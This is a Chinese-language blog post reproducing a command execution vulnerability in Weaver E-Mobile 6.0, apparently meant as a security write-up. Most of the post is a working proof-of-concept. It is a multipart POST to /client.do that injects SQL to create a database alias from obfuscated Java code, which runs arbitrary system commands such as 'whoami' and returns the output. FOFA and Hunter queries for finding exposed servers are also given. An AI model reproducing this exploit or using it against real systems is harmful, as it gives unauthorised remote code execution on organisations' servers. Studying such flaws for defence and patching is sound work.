泛微E-Mobile 6.0 命令执行漏洞

漏洞描述

泛微E-Mobile 6.0 存在命令执行漏洞(注:影响版本不确定,如下图6.6版本的也成功了)
版本信息:E-Mobile 6.0

漏洞复现

fofa语法:fofa:app="泛微-EMobile"
hunter:app.name="泛微 e-mobile OA"
登录页面如下:

POC:

POST /client.do HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Length: 1125

------WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Disposition: form-data; name="method"

getupload
------WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Disposition: form-data; name="uploadID"

1';CREATE ALIAS if not exists abcd AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL abcd('whoami');--
------WebKitFormBoundaryvVPZWWKFq310ISXS--


参考链接:https://mp.weixin.qq.com/s?__biz=Mzk0ODM0MjA0OA==&mid=2247483759&idx=1&sn=8c752411ca579df6fa7bcdbc557a1bab&chksm=c3685d20f41fd436f02cda8c023b139f4016acce0a904e6f2d04ecca752196d613e7232ced30&scene=126&sessionid=1691313401&key=ada403088d2f593d2c8c9d6802e8f94b6dc8f05cab3d4e301d2f0264178cdbb08cd1dc68ba638e13b6bed5e424578ecf90b18bcfdb33c173c780228a965d65f53cd9d31918c0d39dcb674a6245e132ddf627ba169f1f2dce7d5e7a1bb521fcd89203680002bfa7b92cce60c1a79e47a8876ca4b7b9c21b8201d93b445a9c31b3&ascene=15&uin=MTI5ODM0MTMwNQ%3D%3D&devicetype=Windows+10+x64&version=63060012&lang=zh_CN&session_us=gh_03c635669fc8&exportkey=n_ChQIAhIQBWlE1qKgUsUO7LGAtvVARBLvAQIE97dBBAEAAAAAAHJtBMqVmMUAAAAOpnltbLcz9gKNyK89dVj0aRA%2BAqqmEDuOMMC1jRwkwpcWCHD%2BttrytoI9ZInxCGOIRIPMc%2BHW8QbR4hNPxQBJ4Jq5ZLnCDEu%2FBbodJsvyG6wjwUUTkGEI5qL99p%2FNsL8Nhvp2IsGY4SkpazoK9B8hU9fmKXrB2qXkbQt%2FRJ1qwK%2FCtxDGLoba0ZnIIslBnIpcVVb%2FQ2Vf%2FMI23UwkS6nQcF7aptjVZ%2Bau0435ikJqR3t%2F8ZxcBWKmLHtnxazU5Iuc%2Bid6WBKlbKw32GB4OfDShPk%2BvAyzG6mR&acctmode=0&

posted @ 2023-09-01 17:37  学安全的小白  阅读(3502)  评论(0编辑  收藏  举报